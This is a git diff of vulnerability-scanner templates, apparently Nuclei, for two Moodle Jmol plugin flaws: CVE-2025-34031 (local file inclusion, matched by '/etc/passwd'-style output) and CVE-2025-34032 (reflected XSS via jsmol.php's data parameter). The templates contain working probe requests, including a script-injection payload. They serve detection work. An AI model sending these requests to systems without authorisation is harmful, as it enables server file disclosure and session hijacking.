diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/http/cves/2025/CVE-2025-34031.yaml similarity index 62% rename from http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml rename to http/cves/2025/CVE-2025-34031.yaml index 0327636fd01b..07ef35b63e74 100644 --- a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml +++ b/http/cves/2025/CVE-2025-34031.yaml @@ -1,19 +1,22 @@ -id: moodle-filter-jmol-lfi +id: CVE-2025-34031 info: name: Moodle Jmol Filter 6.1 - Local File Inclusion author: madrobot severity: high - description: Moodle is vulnerable to local file inclusion. + description: | + Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server. reference: - https://www.exploit-db.com/exploits/46881 + - https://nvd.nist.gov/vuln/detail/CVE-2025-34031 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N + cve-id: CVE-2025-34031 cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 - tags: moodle,lfi,edb + tags: cve,cve2025,moodle,lfi,edb,jsmol http: - method: GET @@ -22,12 +25,17 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex + part: body regex: - "root:.*:0:0:" - part: body -# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + - type: word + part: content_type + words: + - "text/plain" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f94185a8eabe63f53fbb9f491b50762b1b2d0cf5e86a0659f1ba8980e32c601102210096118270c1fa4708ceef2e9dac7592366eefe698b670ab81c5867034daa2833f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2025/CVE-2025-34032.yaml b/http/cves/2025/CVE-2025-34032.yaml new file mode 100644 index 000000000000..95c989e25f23 --- /dev/null +++ b/http/cves/2025/CVE-2025-34032.yaml @@ -0,0 +1,38 @@ +id: CVE-2025-34032 + +info: + name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting + author: madrobot,ritikchaddha + severity: medium + description: | + A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content. + reference: + - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2025-34032 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cve-id: CVE-2025-34032 + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + max-request: 1 + tags: cve,cve2025,moodle,xss,edb + +http: + - method: GET + path: + - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'len(body) == 41' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + condition: and + + - type: regex + regex: + - '^\s*$' +# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml deleted file mode 100644 index 8af6bb1e208c..000000000000 --- a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: moodle-filter-jmol-xss - -info: - name: Moodle Jsmol - Cross-Site Scripting - author: madrobot - severity: medium - description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks. - reference: - - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 - tags: moodle,xss - -http: - - method: GET - path: - - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - "text/html" -# digest: 490a0046304402202ce4ab09dfbb0d1a283ed44ecf36d605d0ca9b1daf7c865bc6dff2377cae6fe302201755c894c9fb9d830625ffad6822664793240ae4e1f14fd340b92b5c2be20517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file